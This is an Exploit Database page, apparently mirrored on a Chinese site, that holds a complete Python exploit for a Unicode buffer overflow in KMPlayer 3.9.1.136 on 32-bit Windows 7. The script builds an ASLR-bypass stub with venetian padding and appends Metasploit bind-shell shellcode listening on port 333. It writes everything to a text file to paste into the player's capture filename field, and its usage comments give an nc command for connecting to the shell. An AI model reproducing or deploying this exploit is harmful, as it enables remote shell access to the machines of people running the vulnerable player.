KMPlayer 3.9.1.136 – Capture Unicode Buffer Overflow (ASLR Bypass)

• Exploit Database
• 14 阅读

• 作者： Naser Farhadi
  日期： 2015-06-23
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/37344/

• #!/usr/bin/python
  #
  # KMPlayer 3.9.1.136 Capture Unicode Buffer Overflow (ASLR Bypass)
  #
  # Author: Naser Farhadi
  #
  # Date: 21 June 2015 # Version: 3.9.1.136 # Tested on: Windows 7 SP1 (32 bit)
  #
  # Usage:
  # chmod +x KMPlayer.py
  # python KMPlayer.py
  # Alt+c | Video Capture | Alt+a | Audio Capture
  #		paste content of KMPlayer.txt into Filename
  # nc 172.20.10.14 333
  #
  # Video: http://youtu.be/9gtZxR2ioTM
  ##
  
  buffer = (
  "\x50"# PUSH EAX
  "\x40"# Venetian Padding => ADD BYTE PTR DS:[EAX],AL
  "\x5c"# POP ESP
  "\x40"# Venetian Padding => ADD BYTE PTR DS:[EAX],AL
  "\x61"# POPAD
  "\x45"# Venetian Padding => ADD BYTE PTR SS:[EBP],AL
  ""+("\x5f\x45" * 125)+""# (POP EDI/Venetian Padding => ADD BYTE PTR SS:[EBP],AL)*125
  "\x54"# PUSH ESP
  "\x45"# Venetian Padding => ADD BYTE PTR SS:[EBP],AL
  "\x45"# Padding => INC EBP
  "\x45"# Venetian Padding => ADD BYTE PTR SS:[EBP],AL
  "\x61"# POPAD
  "\x47"# Venetian Padding => ADD BYTE PTR DS:[EDI],AL
  "\x33\x77"# POP EBP/RETN from KMPlayer.exe
  "\x58"# POP EAX
  "\x47"# Venetian Padding => ADD BYTE PTR DS:[EDI],AL
  "\x33\x77"# POP EBP/RETN from KMPlayer.exe
  "\x58"# POP EAX
  "\x47"# Venetian Padding => ADD BYTE PTR DS:[EDI],AL
  "\x33\x77"# POP EBP/RETN from KMPlayer.exe
  "\x5d"# POP EBP
  "\x47"# Venetian Padding => ADD BYTE PTR DS:[EDI],AL
  "\x71"# Padding => JNO SHORT 0x2
  "\x71"# Venetian Padding => ADD BYTE PTR DS:[ECX],DH
   )
  
  # msfpayload windows/shell_bind_tcp LPORT=333 R|msfencode -e x86/unicode_mixed BufferRegister=ESP -t c
  shellcode = ("\x54\x47\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
   "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
   "\x49\x41\x6a\x58\x41\x51\x41\x44\x41\x5a\x41\x42\x41\x52\x41"
   "\x4c\x41\x59\x41\x49\x41\x51\x41\x49\x41\x51\x41\x49\x41\x68"
   "\x41\x41\x41\x5a\x31\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49"
   "\x41\x49\x41\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49"
   "\x41\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41\x5a"
   "\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41\x47\x42\x39"
   "\x75\x34\x4a\x42\x69\x6c\x39\x58\x31\x72\x79\x70\x4d\x30\x39"
   "\x70\x53\x30\x75\x39\x67\x75\x4e\x51\x35\x70\x62\x44\x52\x6b"
   "\x70\x50\x6e\x50\x52\x6b\x52\x32\x4c\x4c\x54\x4b\x72\x32\x4b"
   "\x64\x42\x6b\x52\x52\x4d\x58\x5a\x6f\x38\x37\x6f\x5a\x6c\x66"
   "\x4c\x71\x59\x6f\x36\x4c\x4d\x6c\x30\x61\x51\x6c\x4a\x62\x6c"
   "\x6c\x6f\x30\x69\x31\x78\x4f\x4a\x6d\x59\x71\x77\x57\x67\x72"
   "\x4b\x42\x70\x52\x6e\x77\x62\x6b\x6e\x72\x6a\x70\x32\x6b\x6e"
   "\x6a\x6d\x6c\x74\x4b\x30\x4c\x5a\x71\x32\x58\x49\x53\x70\x48"
   "\x6d\x31\x57\x61\x4e\x71\x44\x4b\x61\x49\x6d\x50\x6a\x61\x4a"
   "\x33\x72\x6b\x71\x39\x6e\x38\x58\x63\x6d\x6a\x70\x49\x62\x6b"
   "\x6c\x74\x74\x4b\x4d\x31\x58\x56\x4d\x61\x69\x6f\x54\x6c\x76"
   "\x61\x78\x4f\x7a\x6d\x69\x71\x47\x57\x4f\x48\x57\x70\x43\x45"
   "\x58\x76\x5a\x63\x61\x6d\x59\x68\x6f\x4b\x61\x6d\x6c\x64\x33"
   "\x45\x57\x74\x30\x58\x54\x4b\x30\x58\x6d\x54\x69\x71\x37\x63"
   "\x70\x66\x44\x4b\x4c\x4c\x70\x4b\x34\x4b\x6f\x68\x4d\x4c\x59"
   "\x71\x68\x53\x64\x4b\x6c\x44\x44\x4b\x5a\x61\x78\x50\x73\x59"
   "\x51\x34\x6c\x64\x6e\x44\x61\x4b\x4f\x6b\x43\x31\x4f\x69\x31"
   "\x4a\x70\x51\x49\x6f\x49\x50\x71\x4f\x61\x4f\x70\x5a\x72\x6b"
   "\x6c\x52\x48\x6b\x64\x4d\x51\x4d\x72\x48\x6c\x73\x70\x32\x49"
   "\x70\x49\x70\x33\x38\x43\x47\x52\x53\x4d\x62\x71\x4f\x4e\x74"
   "\x70\x68\x50\x4c\x44\x37\x6c\x66\x6c\x47\x39\x6f\x47\x65\x37"
   "\x48\x42\x70\x6a\x61\x4d\x30\x39\x70\x4d\x59\x37\x54\x42\x34"
   "\x30\x50\x33\x38\x4b\x79\x35\x30\x42\x4b\x59\x70\x4b\x4f\x46"
   "\x75\x31\x5a\x39\x78\x30\x59\x30\x50\x37\x72\x39\x6d\x31\x30"
   "\x42\x30\x4d\x70\x72\x30\x61\x58\x38\x6a\x4c\x4f\x57\x6f\x77"
   "\x70\x79\x6f\x66\x75\x56\x37\x53\x38\x6b\x52\x39\x70\x79\x71"
   "\x4e\x6d\x61\x79\x67\x76\x62\x4a\x4a\x70\x52\x36\x6e\x77\x51"
   "\x58\x57\x52\x59\x4b\x70\x37\x62\x47\x49\x6f\x38\x55\x72\x37"
   "\x42\x48\x74\x77\x69\x59\x4f\x48\x69\x6f\x69\x6f\x76\x75\x6f"
   "\x67\x63\x38\x52\x54\x5a\x4c\x4f\x4b\x68\x61\x79\x6f\x68\x55"
   "\x31\x47\x46\x37\x62\x48\x54\x35\x72\x4e\x6e\x6d\x50\x61\x69"
   "\x6f\x77\x65\x63\x38\x62\x43\x62\x4d\x42\x44\x6d\x30\x75\x39"
   "\x58\x63\x32\x37\x6e\x77\x50\x57\x50\x31\x6a\x56\x71\x5a\x6e"
   "\x32\x32\x39\x51\x46\x59\x52\x49\x6d\x52\x46\x38\x47\x70\x44"
   "\x4f\x34\x4f\x4c\x4d\x31\x6b\x51\x74\x4d\x6e\x64\x6f\x34\x6c"
   "\x50\x76\x66\x6b\x50\x6e\x64\x51\x44\x32\x30\x50\x56\x71\x46"
   "\x6e\x76\x4f\x56\x70\x56\x50\x4e\x62\x36\x6f\x66\x70\x53\x71"
   "\x46\x51\x58\x54\x39\x46\x6c\x6d\x6f\x31\x76\x4b\x4f\x79\x45"
   "\x34\x49\x59\x50\x50\x4e\x6f\x66\x50\x46\x4b\x4f\x30\x30\x63"
   "\x38\x6c\x48\x54\x47\x6d\x4d\x33\x30\x39\x6f\x66\x75\x75\x6b"
   "\x68\x70\x37\x45\x44\x62\x30\x56\x53\x38\x54\x66\x74\x55\x65"
   "\x6d\x53\x6d\x4b\x4f\x79\x45\x6d\x6c\x59\x76\x43\x4c\x6a\x6a"
   "\x35\x30\x4b\x4b\x59\x50\x70\x75\x6b\x55\x55\x6b\x30\x47\x7a"
   "\x73\x33\x42\x50\x6f\x30\x6a\x59\x70\x32\x33\x6b\x4f\x79\x45"
   "\x41\x41")
  
  buffer += shellcode + "\x71" * (1534 - len(shellcode))
  
  open("KMPlayer.txt", "wb").write(buffer)